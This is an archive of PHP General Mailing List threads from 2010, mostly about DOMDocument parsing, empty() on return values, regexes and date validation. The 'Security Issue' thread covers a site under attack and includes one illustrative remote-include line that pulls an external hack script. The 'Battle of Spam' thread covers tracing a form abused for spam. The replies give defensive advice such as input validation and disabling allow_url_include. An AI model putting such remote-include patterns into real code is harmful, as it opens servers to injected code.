-- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
I'm totally agree with you Ash,
I came up here to ask you guys some for light. Anything to well me to track
that M%$#% F#$CK#$# and discover from where he's attacking.
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 3:06 PM, Ashley Sheridan
a...@ashleysheridan.co.ukwrote:
On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..
I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan a...@ashleysheridan.co.uk
wrote:
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
It's not a SQL Injection or XSS problem, Michael.
It's a PHP Injection problem. I know how fix that but the web site is
very
very huge, have lots and lots of partners and i'm have a bug difficult do
identify the focus of the problem.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle mike...@gmail.com
wrote:
It's not that bad.
Use filter functions and sanity checks for input.
Use htmlspecialchars() basically on output.
That should take care of basically everything.
On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com
wrote:
This was my fear.
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com
wrote:
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
Hi Folks!
The portal for which I work is suffering constant attacks that I
feel
that
is PHP Injection. Somehow the hacker is getting to change the cache
files
that our system generates. Concatenating the HTML file with another
that
have an iframe to a malicious JAR file. Do you have any suggestions
to
prevent this action? The hacker has no access to our file system, he
is
imputing the code through some security hole. The problem is that
the
portal
is very big and has lots and lots partners hosted on our estructure
structure. We are failing to identify the focus of this attacks.
Any ideas?
Check all user input + upload: make sure that whatever comes from the
user is validated. Then check all output: make sure that everythin
output is escaped properly. Yes, it's an enormous task, but there's
no
way around it.
Regards
Peter
--
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
What do you mean it's a PHP injection? PHP is all on the server, and the
only way to get at that if you don't have direct access to the server
(which you've said isn't possible as the passwords, etc are all fine)
then the bad data is coming from either a form or another area where
user data is expected. This data might be as simple as unsanitised URL
variables that are intended to fetch a blog entry, to form data sent in
a registration page.
All data coming from the user is bad until proven otherwise.
Thanks,
Ash
http://www.ashleysheridan.co.uk
That data is still coming from somewhere, so is still badly sanitised data
either coming from a form or a URL. You really should go over all the code
to find these and root them out, which is a mammoth task. To narrow it down,
those access logs I mentioned before will help. I think there are ways you
can automatically detect security holes in your software, but if none of
your user data is sanitised correctly, then virtually everything is a
potential security hole.
Thanks,
Ash
http://www.ashleysheridan.co.uk
[PHP] Re: Test [don't read]
I couldn´t resist. tedd tedd.sperl...@gmail.com escreveu na mensagem news:p0624080cc832e662f...@[192.168.1.102]... -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Test [don't read]
I couldn´t resist. tedd tedd.sperl...@gmail.com escreveu na mensagem news:p0624080cc832e662f...@[192.168.1.102]... -- --- http://sperling.com http://ancientstones.com http://earthstones.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
I disagree and this kind of approach could be appropriate if you walk your input globals and apply some sanity checks and appropriate filtering you could fix the issue. On Jun 7, 2010, at 10:52 AM, Igor Escobar titiolin...@gmail.com wrote: I think we're getting off topic here folks... Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote: Oh yeah. I do more than just intval() I make sure they didn't feed me anything BUT numeric text first. I do sanity check before type forcing :) I use garbage in garbage out. So I take what is given to me and yes I escape if before the db of course as well, and then encode on output. On Jun 7, 2010, at 10:45 AM, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote: It's not that bad. Use filter functions and sanity checks for input. Use htmlspecialchars() basically on output. That should take care of basically everything. On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote: This was my fear. Regards, Igor Escobar Systems Analyst Interface Designer + http://blog.igorescobar.com + http://www.igorescobar.com + @igorescobar (twitter) On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com wrote: On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote: Hi Folks! The portal for which I work is suffering constant attacks that I feel that is PHP Injection. Somehow the hacker is getting to change the cache files that our system generates. Concatenating the HTML file with another that have an iframe to a malicious JAR file. Do you have any suggestions to prevent this action? The hacker has no access to our file system, he is imputing the code through some security hole. The problem is that the portal is very big and has lots and lots partners hosted on our estructure structure. We are failing to identify the focus of this attacks. Any ideas? Check all user input + upload: make sure that whatever comes from the user is validated. Then check all output: make sure that everythin output is escaped properly. Yes, it's an enormous task, but there's no way around it. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype htmlspecialchars() is really only good for user input that you are outputting to the browser. For inserting data into a database, use mysql_real_escape_string(). I find it's good to think carefully about what sort of data I expect and sanitise it accordingly. If I want a numerical value, I use intval($_GET['var']) or floatval(). For things like small text box elements, regex's work well depending on the data. For data from select lists of checkboxes, make sure the value given is within a list of pre-determined values you have. Basically, nothing from the user should be trusted at all, ever. As soon as you let go of that trust in the good honesty of people you'll do fine ;) Thanks, Ash http://www.ashleysheridan.co.uk Why waste time validating an integer value when intval() will do that for you? Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] Security Issue
On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external
code that is interpreted as an inner code as if the code included was
more a part of the script.
// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..
I know how to fix that too. The problem is: WHERE I HAVE TO FIX THAT.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:48 PM, Ashley Sheridan
a...@ashleysheridan.co.uk wrote:
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
It's not a SQL Injection or XSS problem, Michael.
It's a PHP Injection problem. I know how fix that but the
web site is very
very huge, have lots and lots of partners and i'm have a bug
difficult do
identify the focus of the problem.
Got it?
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:38 PM, Michael Shadle
mike...@gmail.com wrote:
It's not that bad.
Use filter functions and sanity checks for input.
Use htmlspecialchars() basically on output.
That should take care of basically everything.
On Jun 7, 2010, at 6:16 AM, Igor Escobar
titiolin...@gmail.com wrote:
This was my fear.
Regards,
Igor Escobar
Systems Analyst Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind
peter.e.l...@gmail.com
wrote:
On 7 June 2010 14:54, Igor Escobar
titiolin...@gmail.com wrote:
Hi Folks!
The portal for which I work is suffering constant
attacks that I feel
that
is PHP Injection. Somehow the hacker is getting to
change the cache
files
that our system generates. Concatenating the HTML file
with another that
have an iframe to a malicious JAR file. Do you have any
suggestions to
prevent this action? The hacker has no access to our
file system, he is
imputing the code through some security hole. The
problem is that the
portal
is very big and has lots and lots partners hosted on
our estructure
structure. We are failing to identify the focus of this
attacks.
Any ideas?
Check all user input + upload: make sure that whatever
comes from the
user is validated. Then check all output: make sure that
everythin
output is escaped properly. Yes, it's an enormous task,
but there's no
way around it.
Regards
Peter
--
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
What do you mean it's a PHP injection? PHP is all on the
server, and the
only way to get at that if you don't have direct access to the
server
(which you've said isn't possible as the passwords, etc are
all fine)
then the bad data is coming from either a form or another area
where
user data is expected. This data might be as simple as
unsanitised URL
variables that are intended to fetch a blog entry, to form
data sent in
a registration page.
All data coming from the user is bad until proven otherwise.
Thanks,
Ash
http://www.ashleysheridan.co.uk
That data is still coming from somewhere, so is still badly sanitised
RE: [PHP] Security Issue
From: Ashley Sheridan On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote: PHP Injection is the technical name given to a security hole in PHP applications. When this gap there is a hacker can do with an external code that is interpreted as an inner code as if the code included was more a part of the script. That data is still coming from somewhere, so is still badly sanitised data either coming from a form or a URL. You really should go over all the code to find these and root them out, which is a mammoth task. To narrow it down, those access logs I mentioned before will help. I think there are ways you can automatically detect security holes in your software, but if none of your user data is sanitised correctly, then virtually everything is a potential security hole. You need to narrow your search down a bit. Are there corrupted files on the server? Who has write privileges for those files and directories? Are they tracked via a content management system? Who last wrote to them? Can you further restrict who is allowed to write into those files and directories? Bob McConnell -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOMDocument::loadXML() failed when parsing comments inside a script tag
Hi Adam, Thanks for the update but I'm thinking that it would be much easier if the DOM parser could just ignore the contents of the script tags when parsing HTML content. This way we would not have to out JavaScript or force uses to add JavaScript to a separate file. What do you think? __ Raymond Irving On Sun, Jun 6, 2010 at 11:22 PM, Adam Richardson simples...@gmail.comwrote: On Sun, Jun 6, 2010 at 10:39 PM, Raymond Irving xwis...@gmail.com wrote: Hello, I'm experiencing another issue when attempting to use DOMDocument::loadXML() to load the following HTML code: ?php $html = ' !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd; html body script type=text/javascript !-- var i = 0, html = strongBold Text/strong,Normal Text; document.write(html); i--; // this line causes the parser to fail alert(html); -- /script /body /html'; $dom = new DOMDocument(); $dom-loadXML($html); echo $dom-saveHTML(); ? The parser throws the following error when it encounters i-- in inside the script tag: Warning: DOMDocument::loadXML() [domdocument.loadxml]: Comment not terminated !-- var i = 0, html = strongBold Text in Entity If I remove the like i-- it will load the HTML code just fine. Any ideas as to why this throws an error? __ Raymond A comment declaration starts with !, and ends with , with any number of comments following the form --comment-- in between: http://htmlhelp.com/reference/wilbur/misc/comment.html You'll see at the bottom of the article that they advocate a simple rule in comments: An HTML comment begins with !--, ends with -- and does not contain -- or anywhere in the comment. The occurrence of i-- breaks that rule. In your case, if you're maintaining the pages, you can place the javascript in a separate file or place the javascript in a CDATA section. If you're parsing pages you don't maintain, you can rip out the javascript before performing DOM tasks and parse it separately as needed to avoid potential issues. Adam -- Nephtali: PHP web framework that functions beautifully http://nephtaliproject.com
Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML
Hi Richard, ![CDATA[ htmltagsouphere/soup/tag/html ]] I believe putting ![CDATA[ ]] around the HTML will not work when using DOCTYPE html and it will also prevent the html from being parsed into nodes that can be access via the DOM APIs Or should the html that is inside the JS be urlencoded? lt;stronggt; This works but the only drawback is that we would have to decode it when we want to generate HTML inside the browser Many thanks for the feedback Best regards, __ Raymond Irving On Mon, Jun 7, 2010 at 4:45 AM, Richard Quadling rquadl...@gmail.comwrote: On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote: Hello, Sorry to have to be writing to you directly. I've tried sending this email to the mailing list but it keeps returning with a failure message: Remote host said: 550 5.7.1 reject mailfrom [sbl] It appears that my yahoo about has been black listed? Anyway, I'm hoping you can help me with the following issue: I'm getting a php warning from DOMDocument after running a test script that tried to load some html inside the DOM and then echo the html to the browser: Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag : strong in Entity, line: 8 in C:\www\dom-test.php on line 23 The problem is that DOMDocument::loadHTML() attempts to remove the '/strong' tag from within a JavaScript string variable inside the script tag. If I try to wrap !-- -- around the content of the script tag it will still throw the error. I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It appears to work just fine in version 5.2.0 but the other version throw the above error. Here's the script. Can anyone confirm this error or is there a known workaround? ?php $html = ' !DOCTYPE html html head meta http-equiv=Content-Type content=text/html; charset=UTF-8/ script type=text/javascript var html = strongBold Text/strong,Normal Text; document.write(html); alert(html); /script /head body /body /html '; $dom = new DOMDocument(); $dom-loadHTML($html); echo $dom-saveHTML(); ? Best regards __ Raymond Irving Or should the html that is inside the JS be urlencoded? lt;stronggt; ? -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling
Re: [PHP] Re: DOMDocument throws Unexpected end tag error when loading valid HTML
Thanks Nisse. This works great! I just wish the HTML DOM parser could just ignore the contents of the script tags. It would have made life so much easier for developers working with the DOM. Best regards, __ Raymond Irving 2010/6/7 Nisse Engström news.nospam.0ixbt...@luden.se In HTML, the / sequence closes the script element. You can escape the / character with a backslash: strongBold Text\/strong,Normal Text
[PHP] empty() and method return values
Hi, empty() cannot check the return value of the method or function. which would be the best workaround? empty($class-method()) // gets an error i could do $method_return_value = $class-method() and then run empty() on $method_return_value or is there an better option? i would like to do it in if statement i wrote an class for handling file uploads and there is an method getErrors() which returns empty array in case of 0 errors and i need to check it before i move any files. i'm just curious, what is the right way to do that! Br Tanel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] DOMDocument::loadXML() failed when parsing comments inside a script tag
On Mon, Jun 7, 2010 at 3:30 PM, Raymond Irving xwis...@gmail.com wrote: Hi Adam, Thanks for the update but I'm thinking that it would be much easier if the DOM parser could just ignore the contents of the script tags when parsing HTML content. This way we would not have to out JavaScript or force uses to add JavaScript to a separate file. What do you think? __ Raymond Irving You didn't tell it to open the contents as HTML; you told it to open the contents as XML. Andrew -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] empty() and method return values
On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote: Hi, empty() cannot check the return value of the method or function. which would be the best workaround? empty($class-method()) // gets an error i could do $method_return_value = $class-method() and then run empty() on $method_return_value or is there an better option? i would like to do it in if statement i wrote an class for handling file uploads and there is an method getErrors() which returns empty array in case of 0 errors and i need to check it before i move any files. i'm just curious, what is the right way to do that! Br Tanel Are you sure this is what is giving you the error, as people are using this fine in their examples on the manual page for empty() Thanks, Ash http://www.ashleysheridan.co.uk
[PHP] Re: Test [don't read]
On 6/7/2010 9:15 PM, João Cândido de Souza Neto wrote: I couldn´t resist. teddtedd.sperl...@gmail.com escreveu na mensagem news:p0624080cc832e662f...@[192.168.1.102]... -- --- http://sperling.com http://ancientstones.com http://earthstones.com me too ;) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] regular expression
Peter Lind peter.e.l...@gmail.com wrote in message news:aanlktilqkz8dnc0zacfv70tctf2wqkgpzojccqtuw...@mail.gmail.com... On 1 June 2010 17:33, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Tue, 2010-06-01 at 16:31 +0100, Richard Quadling wrote: $re1 = '/^[a-z]++$/i'; $re2 = '/^[a-z ]++$/i'; -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling Why the double ++ in the expressions there? Surely one + would match the 1 or more characters that you need and the second one would just be surplus? Equally important: why have three people already done this persons homework. 5 minutes googling would have answered this ... -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype i made an regular expression now by myself. i need to check if string starts with 'get' and is followed only by letters a-z case insensitive. am i correct? '/^get[a-z]++$/i' Br Tanel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] empty() and method return values
Ashley Sheridan a...@ashleysheridan.co.uk wrote in message news:1275940320.2248.40.ca...@localhost... On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote: Hi, empty() cannot check the return value of the method or function. which would be the best workaround? empty($class-method()) // gets an error i could do $method_return_value = $class-method() and then run empty() on $method_return_value or is there an better option? i would like to do it in if statement i wrote an class for handling file uploads and there is an method getErrors() which returns empty array in case of 0 errors and i need to check it before i move any files. i'm just curious, what is the right way to do that! Br Tanel Are you sure this is what is giving you the error, as people are using this fine in their examples on the manual page for empty() Thanks, Ash http://www.ashleysheridan.co.uk from the php manual: Note: empty() only checks variables as anything else will result in a parse error. In other words, the following will not work: empty(trim($name)). Br Tanel -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] empty() and method return values
On 7 June 2010 21:52, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote: Hi, empty() cannot check the return value of the method or function. which would be the best workaround? empty($class-method()) // gets an error i could do $method_return_value = $class-method() and then run empty() on $method_return_value or is there an better option? i would like to do it in if statement i wrote an class for handling file uploads and there is an method getErrors() which returns empty array in case of 0 errors and i need to check it before i move any files. i'm just curious, what is the right way to do that! Br Tanel Are you sure this is what is giving you the error, as people are using this fine in their examples on the manual page for empty() Empty only works on variables, not return values from functions. If you're checking the return value from a function, just do if ($class-method()). The return value will be cast to bool - look here for the conversions: http://dk2.php.net/manual/en/language.types.boolean.php Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] empty() and method return values
Peter Lind peter.e.l...@gmail.com wrote in message
news:aanlktinmvaqv-hdgjlq_dwoquvojbbmbfrixnxvqk...@mail.gmail.com...
On 7 June 2010 21:52, Ashley Sheridan a...@ashleysheridan.co.uk wrote:
On Mon, 2010-06-07 at 22:40 +0300, Tanel Tammik wrote:
Hi,
empty() cannot check the return value of the method or function. which
would
be the best workaround?
empty($class-method()) // gets an error
i could do
$method_return_value = $class-method() and then run empty() on
$method_return_value or is there an better option? i would like to do it
in
if statement
i wrote an class for handling file uploads and there is an method
getErrors() which returns empty array in case of 0 errors and i need to
check it before i move any files. i'm just curious, what is the right way
to
do that!
Br
Tanel
Are you sure this is what is giving you the error, as people are using
this fine in their examples on the manual page for empty()
Empty only works on variables, not return values from functions.
If you're checking the return value from a function, just do if
($class-method()). The return value will be cast to bool - look here
for the conversions:
http://dk2.php.net/manual/en/language.types.boolean.php
Regards
Peter
--
hype
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
/hype
Thanks! It works...
?php
class TestClass {
protected $errors = array();
function getErrors() {
return $this-errors;
}
}
$class = new TestClass;
if($class-getErrors()) {
echo 'there is an value!';
} else {
echo 'empty';
}
?
No need to complicate things.
Br
Tanel
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Battle of Spam
Hey - It looks like a PHP form on my server is insecure and is being used to send spam. This is Rackspace's best guess. The problem is there are SO MANY forms on all the web sites on this server that it would be a nightmare task to try and look at them all to be sure they're properly secured. Is anyone aware of a way to shortcut this process, maybe find out what script(s) are being attacked to send the spam? :-( -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Security Issue
On 07/06/2010 20:00, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my code...
include ('http:///externalhackscript.txt');
//my code...
//my code..
can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. /allow_url_include = Off in php.ini
HTH
Rich
/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
On 7 June 2010 22:25, Brian Dunning br...@briandunning.com wrote: Hey - It looks like a PHP form on my server is insecure and is being used to send spam. This is Rackspace's best guess. The problem is there are SO MANY forms on all the web sites on this server that it would be a nightmare task to try and look at them all to be sure they're properly secured. Is anyone aware of a way to shortcut this process, maybe find out what script(s) are being attacked to send the spam? :-( Check your server access logs - if it's sending lots of spam it's getting hit more than other forms (and you should possibly see other equally interesting signs, such as referrer). Also ... if you're letting users specify an email address to send to as well as content and you don't make sure to authenticate users, you're really asking to get abused. Regards Peter -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
Brian Dunning wrote: Hey - It looks like a PHP form on my server is insecure and is being used to send spam. This is Rackspace's best guess. The problem is there are SO MANY forms on all the web sites on this server that it would be a nightmare task to try and look at them all to be sure they're properly secured. Is anyone aware of a way to shortcut this process, maybe find out what script(s) are being attacked to send the spam? :-( Usually it isn't your php/html form that is insecure, it is the processing script that processes said form. Change all the forms to use a single processing script and then you won't have such a big problem tracking down the information processing error/insecurity that you are having. -- Jim Lucas A: Maybe because some people are too annoyed by top-posting. Q: Why do I not get an answer to my question(s)? A: Because it messes up the order in which people normally read text. Q: Why is top-posting such a bad thing? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
On Mon, Jun 07, 2010 at 01:25:28PM -0700, Brian Dunning wrote: Hey - It looks like a PHP form on my server is insecure and is being used to send spam. This is Rackspace's best guess. The problem is there are SO MANY forms on all the web sites on this server that it would be a nightmare task to try and look at them all to be sure they're properly secured. Is anyone aware of a way to shortcut this process, maybe find out what script(s) are being attacked to send the spam? Assuming that the form is using the mail() function or something similar to send the spam, add yourself as a recipient of the forms you manage. Then you will see for sure if *your* forms are being used for spam. If you find that your forms are being used to spam, implement CAPTCHA to hinder bots. (Nothing will stop humans manually spamming via your forms.) Very little short of this will stop bot spam. You could sanitize form values and reject spam-like forms, but that's complicated and error-prone. CAPTCHA is simpler. Paul -- Paul M. Foster -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
Agreed that's a great overall strategy but what I need now is a way to track down the offending script, within the next few days if possible. On Jun 7, 2010, at 1:35 PM, Jim Lucas wrote: Change all the forms to use a single processing script and then you won't have such a big problem tracking down the information processing error/insecurity that you are having. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] complex if statement for field validation
Hello,
I've got a form with three fields that are not required for proper
completion of it, ending month, day, year fields. If a user enters
nothing no problem, but if those form fields are entered I need them
validated. They have to be in the correct format -MM-DD date
format and that value also has to be greater than the starting date
validated previously. I've got some not working code.
Thanks.
Dave.
// if an ending date field was entered validate that
// also must be greater than the starting date values
if(!empty($_POST['month1']) !empty($_POST['day1'])
!empty($_POST['year1']) {
$month1=$_POST['month1'];
$day1=$_POST['day1'];
$year1=$_POST['year1'];
$date_value1=$year1-$month1-$day1;
}
if(!checkdate($month1,$day1,$year1)) {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
}
if(!checkdate($month1,$day1,$year1)) $date_value {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
Brian Dunning wrote: Agreed that's a great overall strategy but what I need now is a way to track down the offending script, within the next few days if possible. On Jun 7, 2010, at 1:35 PM, Jim Lucas wrote: Change all the forms to use a single processing script and then you won't have such a big problem tracking down the information processing error/insecurity that you are having. Create a user space function called mail_filtered() that accepts all the parameters that the usual mail function does. Then change all occurrences of the mail() function call to mail_filtered() and for each email sent, create a log of it and a shallow copy of debug_backtrace() so you can see where it originated. I always use some kind of mail lib that allows me to debug emails by adding extra information and redirecting the address during dev. Cheers, Rob. -- E-Mail Disclaimer: Information contained in this message and any attached documents is considered confidential and legally protected. This message is intended solely for the addressee(s). Disclosure, copying, and distribution are prohibited unless authorized. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Battle of Spam
I think I must have misstated the problem. Thanks to everyone for the replies, but the question is not how to fix it, it's how to find the script being attacked. Many different admins manage many different sites on this server, and I can't even begin to guess how many mail forms are on there from different programmers. I'm currently downloading the logs as Peter suggested, and will take a look. I'm not much of a sysad and I just thought maybe someone might know a way to sniff outgoing email or something, I really don't know how to attack this. Fixing the scripts is a long term solution, obviously, but I need a short term fix other than killing email on the apache account. Might be more of a Linux question than a PHP question. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] regular expression
On Mon, 2010-06-07 at 22:54 +0300, Tanel Tammik wrote: Peter Lind peter.e.l...@gmail.com wrote in message news:aanlktilqkz8dnc0zacfv70tctf2wqkgpzojccqtuw...@mail.gmail.com... On 1 June 2010 17:33, Ashley Sheridan a...@ashleysheridan.co.uk wrote: On Tue, 2010-06-01 at 16:31 +0100, Richard Quadling wrote: $re1 = '/^[a-z]++$/i'; $re2 = '/^[a-z ]++$/i'; -- - Richard Quadling Standing on the shoulders of some very clever giants! EE : http://www.experts-exchange.com/M_248814.html EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731 ZOPA : http://uk.zopa.com/member/RQuadling Why the double ++ in the expressions there? Surely one + would match the 1 or more characters that you need and the second one would just be surplus? Equally important: why have three people already done this persons homework. 5 minutes googling would have answered this ... -- hype WWW: http://plphp.dk / http://plind.dk LinkedIn: http://www.linkedin.com/in/plind BeWelcome/Couchsurfing: Fake51 Twitter: http://twitter.com/kafe15 /hype i made an regular expression now by myself. i need to check if string starts with 'get' and is followed only by letters a-z case insensitive. am i correct? '/^get[a-z]++$/i' Br Tanel Yep, that looks right. If you're in any doubt, there are lots of online regex testers which you can run strings and patterns against. Just Google for them. Thanks, Ash http://www.ashleysheridan.co.uk
Re: [PHP] complex if statement for field validation
On Mon, 2010-06-07 at 16:51 -0400, David Mehler wrote:
Hello,
I've got a form with three fields that are not required for proper
completion of it, ending month, day, year fields. If a user enters
nothing no problem, but if those form fields are entered I need them
validated. They have to be in the correct format -MM-DD date
format and that value also has to be greater than the starting date
validated previously. I've got some not working code.
Thanks.
Dave.
// if an ending date field was entered validate that
// also must be greater than the starting date values
if(!empty($_POST['month1']) !empty($_POST['day1'])
!empty($_POST['year1']) {
$month1=$_POST['month1'];
$day1=$_POST['day1'];
$year1=$_POST['year1'];
$date_value1=$year1-$month1-$day1;
}
if(!checkdate($month1,$day1,$year1)) {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
}
if(!checkdate($month1,$day1,$year1)) $date_value {
echo Invalid Date.\n;
} else {
echo Entered Date is correct.\n;
}
strtotime() can create a timestamp from a date string that you can use
to compare two dates, and the strings can be put together with the
values from the variables. I'm assuming that your form is using a
combination of select lists to create the date, so you should be able to
just grab the integer values to test they are within valid ranges for a
date.
Thanks,
Ash
http://www.ashleysheridan.co.uk
Re: [PHP] Battle of Spam
